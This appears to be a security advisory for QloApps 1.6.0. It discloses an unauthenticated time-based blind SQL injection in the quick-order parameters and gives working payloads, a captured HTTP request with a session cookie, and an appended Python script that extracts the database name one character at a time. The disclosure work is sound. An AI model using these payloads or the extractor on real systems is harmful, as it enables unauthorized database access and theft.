Affected Version: QloApps 1.6.0

Product Link: https://github.com/webkul/hotelcommerce

Security Issue:

(Unauthenticated) - Time-based (blind) SQL injection via the GET parameters date_from, date_to, and id_product

URL: <http://localhost/hotelcommerce/quick-order>
Method: GET
Vulnerable Parameters:
	date_from
	date_to
	id_product
	
Payload:	
	date_from=(select(0)from(select(sleep(5)))v)/*'%2B(select(0)from(select(sleep(4)))v)%2B'"%2B(select(0)from(select(sleep(4)))v)%2B"*/
	date_to=0'XOR(if(now()=sysdate()%2Csleep(5)%2C0))XOR'Z
	id_product=(select(0)from(select(sleep(5)))v)

Vulnerability Description:

SQL injection (SQLi) is an injection attack in which attacker-controlled input is concatenated into the SQL statements an application sends to its database server, letting the attacker execute SQL of their choosing. In the time-based (blind) variant reported here the query result is never reflected in the page; the injection is confirmed by making the database call sleep() and observing that the response is delayed by the requested number of seconds.

Process to reproduce:

1. Go to: <http://localhost/hotelcommerce/8-the-hotel-prime?date_from=2023-06-15&date_to=2023-06-16&occupancy%5B0%5D%5Badults%5D=1&occupancy%5B0%5D%5Bchildren%5D=0#hotelInteriorBlock>
2. Click "Book Now", then "Proceed to checkout".
3. You are redirected to /hotelcommerce/quick-order.
4. Intercept the request in Burp Suite and replace the value of each parameter with the corresponding payload above (one parameter at a time is enough).
5. Compare the response time (ms) shown in Burp Suite with the sleep() value in the payload: a response delayed by that many seconds, reproducibly, confirms the time-based SQL injection.

HTTP Request:


GET /hotelcommerce/quick-order?date_from=2023-06-12%2000:00:00&date_to=2023-06-13%2000:00:00&deleteFromOrderLine=1&id_product=(select(0)from(select(sleep(5)))v) HTTP/1.1
Host: localhost
Cache-Control: max-age=0
sec-ch-ua: 
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: ""
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PrestaShop-982ef6ed83d922bf6ce9ada599a2fd13=def502009cbd08e31224f80ac69a0864b64c4433d2766a286e27a1c01fd4c0d4313a57ed7b49b7d45766d002321202a4269de91e4a5cbe311d8631407b33b8334a7efc49bf7cb95136772b1c683a3d8ea5f73f3284fde66f6f789d19294b62367b4ece19cdf8cf90b4643c3812b2b2284ba9b9fe18e2efb0c43c699c05b612aa6eab0078428ba2863b01f6051df7925847edbfa9d2186e20db104457ece6168c0c96474435376d65b5687750d44676028cc578fecc742a5f5a1381525259974e277fcaa768c0c86abb270bb7a477d612bf4586f64a1d7740a53bc76c2b873ccdfa207bad79513b25320bce4deddec6d89f2b43a8ad8b470dc56860dd5c3df1e89f789a9000bce3ce44e83eecbb656ad030d8c876e2081710f487a9c5193c27066ffc413929a814945870126bd21b6824f78a101f1c6b001f82728280266e8bc31570097585782c4a5d965df0a1759679461814d6bf41791d5d8dc3871c2d47e488246359; PrestaShop-daf117f818c8eeecfa2bccccdd849a8c=...
Connection: close

HTTP Response:

The response to the request above arrives only after the sleep() delay carried in the payload (5 seconds here); see the screenshots for the measured response times in Burp Suite.

Proof of Exploit:

SQL query: SELECT database()
Result: qloapps
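
As an added illustration, not part of the original report or of the QloApps project, the Python script below automates steps 4 and 5 of the reproduction (a timing oracle on the id_product payload) and the kind of character-by-character inference behind the SELECT database() result above. It assumes a local test instance at the advisory's quick-order URL; the conditional sleep payload is an extension of the report's id_product payload (assumption), and SimulatedTarget is a constructed stand-in that mimics only the timing behaviour of those payloads so the script runs offline.

```python
import re
import time
from urllib.parse import unquote_plus, urlencode

# Added example, not QloApps code. TARGET and BASE_PARAMS mirror the advisory's
# quick-order request against a local test instance (assumed to be reachable).
TARGET = "http://localhost/hotelcommerce/quick-order"
BASE_PARAMS = {
    "date_from": "2023-06-12 00:00:00",
    "date_to": "2023-06-13 00:00:00",
    "deleteFromOrderLine": "1",
}


def build_url(param, value):
    """Place the raw injection string `value` in `param` next to the benign parameters."""
    params = dict(BASE_PARAMS)
    params[param] = value
    return f"{TARGET}?{urlencode(params)}"


def sleep_payload(seconds):
    """The advisory's id_product payload, with the delay made adjustable."""
    return f"(select(0)from(select(sleep({seconds})))v)"


def conditional_sleep_payload(pos, ch, seconds):
    """Same subquery shape, but it only sleeps when character `pos` of database()
    is `ch`. This conditional form is an extension of the advisory's payload."""
    return (f"(select(0)from(select(if(substring(database(),{pos},1)='{ch}',"
            f"sleep({seconds}),0)))v)")


def timed(send, url):
    """Seconds the request takes; `send` is any callable that fetches a URL."""
    start = time.monotonic()
    send(url)
    return time.monotonic() - start


def is_time_injectable(send, param, delay=5, trials=2):
    """Step 5 of the reproduction: the sleep() request must take about `delay`
    seconds longer than a benign request, on every trial. The 0.8 factor leaves
    room for jitter in the baseline measurement."""
    baseline = timed(send, build_url(param, "1"))
    for _ in range(trials):
        if timed(send, build_url(param, sleep_payload(delay))) - baseline < delay * 0.8:
            return False
    return True


def extract_database_name(send, param, delay=5, max_len=32,
                          alphabet="abcdefghijklmnopqrstuvwxyz0123456789_"):
    """Infer database() one character at a time: a correct guess makes the server
    sleep, a wrong one returns at once. A position where nothing matches is the
    end of the string (substring() past the end yields '')."""
    baseline = timed(send, build_url(param, "1"))
    name = ""
    for pos in range(1, max_len + 1):
        for ch in alphabet:
            url = build_url(param, conditional_sleep_payload(pos, ch, delay))
            if timed(send, url) - baseline >= delay * 0.8:
                name += ch
                break
        else:
            break
    return name


class SimulatedTarget:
    """Constructed stand-in for the vulnerable endpoint so the oracle runs offline.
    It reproduces only the timing behaviour of the two payload shapes above for a
    database called `db_name`; it is not QloApps and executes no SQL."""

    COND = re.compile(r"if\(substring\(database\(\),(\d+),1\)='(.)',sleep\(([\d.]+)\),0\)")
    SLEEP = re.compile(r"sleep\(([\d.]+)\)")

    def __init__(self, db_name="qloapps"):
        self.db_name = db_name

    def __call__(self, url):
        query = unquote_plus(url)
        m = self.COND.search(query)
        if m:
            pos, ch, secs = int(m.group(1)), m.group(2), float(m.group(3))
            if pos <= len(self.db_name) and self.db_name[pos - 1] == ch:
                time.sleep(secs)
            return
        m = self.SLEEP.search(query)
        if m:
            time.sleep(float(m.group(1)))
```

Against a live test instance, pass a real fetcher as `send` (for example `lambda url: requests.get(url, timeout=30)`) and keep `delay=5` as in the report's payloads; with the simulator a delay of 0.05 is enough. Because the oracle subtracts a benign baseline and requires the extra latency on every trial, a slow but uninjected page does not produce a false positive, and the same `send`/`param` pair works for date_from and date_to once their benign values are swapped for the payloads listed above.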

Screenshot:

sqli1.PNG

sqli2.PNG

sqli3.PNG